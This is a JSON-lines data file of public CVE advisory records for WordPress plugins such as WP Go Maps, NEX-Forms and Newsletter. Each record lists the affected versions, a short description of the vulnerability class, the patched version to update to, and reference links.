{"CVE_ID":"CVE-2024-5994","slug":"wp-google-maps","versionImpact":"9.0.38","versionEndExcluding":"9.0.39","description":"The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Custom JS option in versions up to, and including, 9.0.38. This makes it possible for authenticated attackers that have been explicitly granted permissions by an administrator, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Version 9.0.39 adds a caution to make administrators aware of the possibility for abuse if permissions are granted to lower-level users.","recommendation":"Update to version 9.0.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd0597d2-07ba-4fb4-bf73-95770f8c3d6b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd0597d2-07ba-4fb4-bf73-95770f8c3d6b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-google-maps\\\/trunk\\\/html\\\/settings-page.html.php#L538\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-google-maps\\\/trunk\\\/html\\\/settings-page.html.php#L538\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-google-maps\\\/trunk\\\/html\\\/atlas-novus\\\/settings-page.html.php#L442\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-google-maps\\\/trunk\\\/html\\\/atlas-novus\\\/settings-page.html.php#L442\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3557","slug":"wp-google-maps","versionImpact":"9.0.36","versionEndExcluding":"9.0.37","description":"The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpgmza shortcode in all versions up to, and including, 9.0.36 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.0.37, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef792894-b841-495c-aae0-08476a435471?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef792894-b841-495c-aae0-08476a435471?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-google-maps\\\/trunk\\\/includes\\\/class.shortcodes.php?rev=3045434\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-google-maps\\\/trunk\\\/includes\\\/class.shortcodes.php?rev=3045434\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3083067%40wp-google-maps%2Ftrunk&old=3062437%40wp-google-maps%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3083067%40wp-google-maps%2Ftrunk&old=3062437%40wp-google-maps%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1582","slug":"wp-google-maps","versionImpact":"9.0.32","versionEndExcluding":"9.0.33","description":"The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpgmza' shortcode in all versions up to, and including, 9.0.32 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.0.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67f405d0-7139-4b5c-ab3c-cd1de5592866?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67f405d0-7139-4b5c-ab3c-cd1de5592866?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045434\\\/wp-google-maps\\\/trunk\\\/includes\\\/class.shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045434\\\/wp-google-maps\\\/trunk\\\/includes\\\/class.shortcodes.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4839","slug":"wp-google-maps","versionImpact":"9.0.32","versionEndExcluding":"9.0.33","description":"The WP Go Maps for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 9.0.32 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 9.0.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/208c5ed1-879f-45ea-833e-d2e54c4f063f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/208c5ed1-879f-45ea-833e-d2e54c4f063f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045434\\\/wp-google-maps\\\/trunk\\\/legacy-core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3045434\\\/wp-google-maps\\\/trunk\\\/legacy-core.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6697","slug":"wp-google-maps","versionImpact":"9.0.28","versionEndExcluding":"9.0.29","description":"The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the map id parameter in all versions up to, and including, 9.0.28 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 9.0.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3c3115b-8921-429d-b517-b946edab1cd5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3c3115b-8921-429d-b517-b946edab1cd5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022232\\\/wp-google-maps\\\/trunk\\\/html\\\/atlas-novus\\\/map-edit-page\\\/map-edit-page.html.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022232\\\/wp-google-maps\\\/trunk\\\/html\\\/atlas-novus\\\/map-edit-page\\\/map-edit-page.html.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6627","slug":"wp-google-maps","versionImpact":"9.0.27","versionEndExcluding":"9.0.28","description":"The WP Go Maps (formerly WP Google Maps) WordPress plugin before 9.0.28 does not properly protect most of its REST API routes, which attackers can abuse to store malicious HTML\/Javascript on the site.","recommendation":"Update to version 9.0.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f5687d0e-98ca-4449-98d6-7170c97c8f54\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f5687d0e-98ca-4449-98d6-7170c97c8f54\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/blog\\\/stored-xss-fixed-in-wp-go-maps-9-0-28\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/blog\\\/stored-xss-fixed-in-wp-go-maps-9-0-28\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3592","slug":"quiz-master-next","versionImpact":"9.0.1","versionEndExcluding":"9.0.2","description":"The Quiz And Survey Master \u2013 Best Quiz, Exam and Survey Plugin for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'question_id' parameter in all versions up to, and including, 9.0.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 9.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc085413-db43-43e3-9b60-aeb341eed4e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc085413-db43-43e3-9b60-aeb341eed4e1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097878\\\/quiz-master-next\\\/trunk\\\/php\\\/admin\\\/options-page-questions-tab.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097878\\\/quiz-master-next\\\/trunk\\\/php\\\/admin\\\/options-page-questions-tab.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4934","slug":"quiz-master-next","versionImpact":"9.0.1","versionEndExcluding":"9.0.2","description":"The Quiz and Survey Master (QSM)  WordPress plugin before 9.0.2 does not validate and escape some of its Quiz fields before outputting them back in a page\/post where the Quiz is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 9.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2270ee1-3211-4b16-b3d7-6cdd732f7155\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2270ee1-3211-4b16-b3d7-6cdd732f7155\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4680","slug":"tweet-old-post","versionEndExcluding":"9.0.11","description":"The Revive Old Posts WordPress plugin before 9.0.11 unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4197386-975d-4e53-8fc9-9425732da9af\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4197386-975d-4e53-8fc9-9425732da9af\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6155","slug":"greenshift-animation-and-page-builder-blocks","versionImpact":"9.0.0","versionEndExcluding":"9.0.1","description":"The Greenshift \u2013 animation and page builder blocks plugin for WordPress is vulnerable to Authenticated (Subscriber+) Server-Side Request Forgery and Stored Cross Site Scripting in all versions up to, and including, 9.0.0 due to a missing capability check in the greenshift_download_file_localy function, along with no SSRF protection and sanitization on uploaded SVG files. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application that can also be leveraged to download malicious SVG files containing Cross-Site Scripting payloads to the server. On Cloud-based servers, attackers could retrieve the instance metadata. The issue was partially patched in version 8.9.9 and fully patched in version 9.0.1.","recommendation":"Update to version 9.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/greenshift-animation-and-page-builder-blocks\\\/tags\\\/8.9.8\\\/settings.php#L1385\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/greenshift-animation-and-page-builder-blocks\\\/tags\\\/8.9.8\\\/settings.php#L1385\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe3cfaf4-67c8-47af-bd58-e8ad27a03fae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe3cfaf4-67c8-47af-bd58-e8ad27a03fae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10820","slug":"woocommerce-upload-files","versionImpact":"84.3","versionEndExcluding":"84.4","description":"The WooCommerce Upload Files plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the upload_files() function in all versions up to, and including, 84.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 84.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9371b37-53c5-4a4f-a500-c6d58d4d3c5a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9371b37-53c5-4a4f-a500-c6d58d4d3c5a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-upload-files\\\/11442983\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-upload-files\\\/11442983\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4208","slug":"nex-forms-express-wp-form-builder","versionImpact":"8.9.1","versionEndExcluding":"8.9.2","description":"The NEX-Forms \u2013 Ultimate Form Builder \u2013 Contact forms and much more plugin for WordPress is vulnerable to Limited Code Execution in all versions up to, and including, 8.9.1 via the get_table_records function. This is due to the unsanitized use of user-supplied input in call_user_func(). This makes it possible for authenticated attackers, with Custom-level access, to execute arbitrary PHP functions that meet specific constraints (static methods or global functions accepting a single array parameter).","recommendation":"Update to version 8.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php?rev=3226607#L3420\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php?rev=3226607#L3420\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d2b7215-d3a7-4e5a-ae9b-65fecc26dceb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d2b7215-d3a7-4e5a-ae9b-65fecc26dceb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3468","slug":"nex-forms-express-wp-form-builder","versionImpact":"8.9.1","versionEndExcluding":"8.9.2","description":"The NEX-Forms \u2013 Ultimate Form Builder \u2013 Contact forms and much more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the clean_html and form_fields parameters in all versions up to, and including, 8.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Custom-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 8.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.db.php?rev=3226607#L303\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.db.php?rev=3226607#L303\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a33a7ba5-c6f8-4cf4-8011-8312e9c5da8f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a33a7ba5-c6f8-4cf4-8011-8312e9c5da8f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37297","slug":"woocommerce","versionImpact":"8.9.2","versionEndExcluding":"8.8.5","description":"WooCommerce is an open-source e-commerce platform built on WordPress. A vulnerability introduced in WooCommerce 8.8 allows for cross-site scripting. A bad actor can manipulate a link to include malicious HTML & JavaScript content. While the content is not saved to the database, the links may be sent to victims for malicious purposes. The injected JavaScript could hijack content & data stored in the browser, including the session. The URL content is read through the `Sourcebuster.js` library and then inserted without proper sanitization to the classic checkout and registration forms. Versions 8.8.5 and 8.9.3 contain a patch for the issue. As a workaround, one may disable the Order Attribution feature.","recommendation":"Update to one of the following versions, or a newer patched version: 8.8.5, 8.9.3","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/woocommerce\\\/woocommerce\\\/security\\\/advisories\\\/GHSA-cv23-q6gh-xfrf\",\"name\":\"https:\\\/\\\/github.com\\\/woocommerce\\\/woocommerce\\\/security\\\/advisories\\\/GHSA-cv23-q6gh-xfrf\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/woocommerce\\\/woocommerce\\\/commit\\\/0e9888305d0cb9557e58f558526ab11cb3bcc4b4\",\"name\":\"https:\\\/\\\/github.com\\\/woocommerce\\\/woocommerce\\\/commit\\\/0e9888305d0cb9557e58f558526ab11cb3bcc4b4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/woocommerce\\\/woocommerce\\\/commit\\\/915e32a42762916b745a7e663c8b69a698da8b67\",\"name\":\"https:\\\/\\\/github.com\\\/woocommerce\\\/woocommerce\\\/commit\\\/915e32a42762916b745a7e663c8b69a698da8b67\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/developer.woocommerce.com\\\/2024\\\/06\\\/10\\\/developer-advisory-xss-vulnerability-8-8-0\",\"name\":\"https:\\\/\\\/developer.woocommerce.com\\\/2024\\\/06\\\/10\\\/developer-advisory-xss-vulnerability-8-8-0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3582","slug":"newsletter","versionImpact":"8.8.4","versionEndExcluding":"8.8.5","description":"The Newsletter  WordPress plugin before 8.85 does not sanitise and escape some of its Form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 8.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19db8521-8dff-48c5-b21a-1001895292e0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19db8521-8dff-48c5-b21a-1001895292e0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3581","slug":"newsletter","versionImpact":"8.8.4","versionEndExcluding":"8.8.5","description":"The Newsletter  WordPress plugin before 8.8.5 does not validate and escape some of its Widget options before outputting them back in a page\/post where the block is embed, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 8.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2d96f018-510d-40ab-9e73-76fa44784813\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2d96f018-510d-40ab-9e73-76fa44784813\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4897","slug":"backupbuddy","versionEndExcluding":"8.8.3","description":"The BackupBuddy WordPress plugin before 8.8.3 does not sanitise and escape some parameters before outputting them back in various places, leading to Reflected Cross-Site Scripting","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7b0eeafe-b9bc-43b2-8487-a23d3960f73f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7b0eeafe-b9bc-43b2-8487-a23d3960f73f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13498","slug":"nex-forms-express-wp-form-builder","versionImpact":"8.8.1","versionEndExcluding":"8.8.2","description":"The NEX-Forms \u2013 Ultimate Form Builder \u2013 Contact forms and much more plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 8.8.1 via file uploads due to insufficient directory listing prevention and lack of randomization of file names. This makes it possible for unauthenticated attackers to extract sensitive data including files uploaded via a form.","recommendation":"Update to version 8.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235420\\\/nex-forms-express-wp-form-builder\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235420\\\/nex-forms-express-wp-form-builder\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f188a5e6-699e-4e1a-b4e4-7fb4056b0bee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f188a5e6-699e-4e1a-b4e4-7fb4056b0bee?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3584","slug":"newsletter","versionImpact":"8.8.1","versionEndExcluding":"8.8.2","description":"The Newsletter  WordPress plugin before 8.8.2 does not sanitise and escape some of its Subscription settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 8.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76937bdd-7ffa-4b5e-ade1-60da095a03a3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76937bdd-7ffa-4b5e-ade1-60da095a03a3\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76937bdd-7ffa-4b5e-ade1-60da095a03a3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/76937bdd-7ffa-4b5e-ade1-60da095a03a3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9951","slug":"wp-photo-album-plus","versionImpact":"8.8.05.003","versionEndExcluding":"8.8.07.004","description":"The WP Photo Album Plus plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wppa-tab' parameter in all versions up to, and including, 8.8.05.003 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 8.8.07.004, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a4f0c06-db88-4950-b1f5-b2aab480c974?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a4f0c06-db88-4950-b1f5-b2aab480c974?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3170202%40wp-photo-album-plus&new=3170202%40wp-photo-album-plus&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3170202%40wp-photo-album-plus&new=3170202%40wp-photo-album-plus&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11844","slug":"ideapush","versionImpact":"8.71","versionEndExcluding":"8.72","description":"The IdeaPush plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the idea_push_taxonomy_save_routine function in all versions up to, and including, 8.71. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete terms for the \"boards\" taxonomy.","recommendation":"Update to version 8.72, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ideapush\\\/trunk\\\/ideapush.php#L766\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ideapush\\\/trunk\\\/ideapush.php#L766\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198488\\\/ideapush\\\/trunk\\\/ideapush.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198488\\\/ideapush\\\/trunk\\\/ideapush.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34603c3f-834f-4a2a-9b9f-5213155d4317?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34603c3f-834f-4a2a-9b9f-5213155d4317?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10862","slug":"nex-forms-express-wp-form-builder","versionImpact":"8.7.15","versionEndExcluding":"8.7.16","description":"The NEX-Forms \u2013 Ultimate Form Builder \u2013 Contact forms and much more plugin for WordPress is vulnerable to SQL Injection via the 'search_params' parameter in all versions up to, and including, 8.7.13 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This can be exploited via CSRF due to a lack of nonce validation on the get_table_records AJAX action.","recommendation":"Update to version 8.7.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L3065\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/trunk\\\/includes\\\/classes\\\/class.dashboard.php#L3065\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab807beb-0e20-47e4-be3e-9e8f50b84c7b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab807beb-0e20-47e4-be3e-9e8f50b84c7b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3583","slug":"newsletter","versionImpact":"8.7.0","versionEndExcluding":"8.7.1","description":"The Newsletter  WordPress plugin before 8.7.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 8.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6582e14-e21e-48e7-9b4c-0044fb199825\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6582e14-e21e-48e7-9b4c-0044fb199825\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4037","slug":"wp-photo-album-plus","versionImpact":"8.7.00.003","versionEndExcluding":"8.7.00.004","description":"The WP Photo Album Plus plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 8.7.02.003. This is due to the plugin allowing unauthenticated users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 8.7.00.004, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d6b95ee-0a0d-49f7-83b1-4716eec3b863?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d6b95ee-0a0d-49f7-83b1-4716eec3b863?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-photo-album-plus\\\/trunk\\\/wppa-ajax.php#L1138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-photo-album-plus\\\/trunk\\\/wppa-ajax.php#L1138\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3079831%40wp-photo-album-plus&new=3079831%40wp-photo-album-plus&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3079831%40wp-photo-album-plus&new=3079831%40wp-photo-album-plus&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3078746%40wp-photo-album-plus&new=3078746%40wp-photo-album-plus&sfp_email=&sfph_mail=#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3078746%40wp-photo-album-plus&new=3078746%40wp-photo-album-plus&sfp_email=&sfph_mail=#file3\",\"refsource\":\"\",\"tags\":[]}]"}
